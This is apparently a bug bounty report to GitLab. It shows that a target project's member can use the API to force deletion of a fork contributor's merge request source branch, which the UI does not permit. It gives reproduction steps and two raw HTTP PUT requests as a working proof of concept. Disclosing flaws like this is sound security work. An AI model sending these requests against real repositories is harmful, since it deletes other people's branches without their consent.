Able to Delete Source Branch of MR

HackerOne report #633386 by ngalog on 2019-07-02, assigned to estrike:

Summary

For every MR from fork project to original project, there are two gruops of people can make changes.

  1. The MR author, i.e. fork project developer/maintainer
  2. The MR target project's developer/maintainer, i.e. original project developer/maintainer

Normally, people in no.1 is only able to change the MR's metadata such as of title/description html/remove source branch after merge etc, but not the label or milestones etc.

People in no.2 is only able to change the MR's label, milestones, merge when pipeline succeed etc, but not remove source branch after merge.

I found that, member of original project, is able to change the setting of remove source branch after merge in gitlab API, which is not possible in Gitlab UI.

Impact

MR target project member could delete source project's branch without their consent/proper permission

Steps to reproduce

  • As user A, create a public project with a random name such as projectZero
  • As user B, fork projectZero, create a new file, then create a new branch, then submit a MR to projectZero, remembe the Delete source branch when merge request is accepted. is UNCHECKED
  • As user A, prepare your gitlab API scope token, and issue below request
PUT /api/v4/projects/:project_id_of_original_project/merge_requests/:mr_iid HTTP/1.1  
Host: gitlab.com  
private-token: YOUR_TOKEN  
Content-Length: 136  
content-type:application/json


{"should_remove_source_branch":true,"remove_source_branch":true,"force_remove_source_branch":true}  
PUT /api/v4/projects/:project_id_of_original_project/merge_requests/:mr_iid/merge HTTP/1.1  
Host: gitlab.com  
private-token: YOUR_TOKEN  
Content-Length: 136  
content-type:application/json


{"should_remove_source_branch":true,"remove_source_branch":true,"force_remove_source_branch":true}
  • Then as user B, you should notice your MR source branch is remoevd without your consent.

Examples

reproducible on gitlab.com

Impact

MR source branch could be deleted by target project's member without proper authorization/permission

Edited by GitLab SecurityBot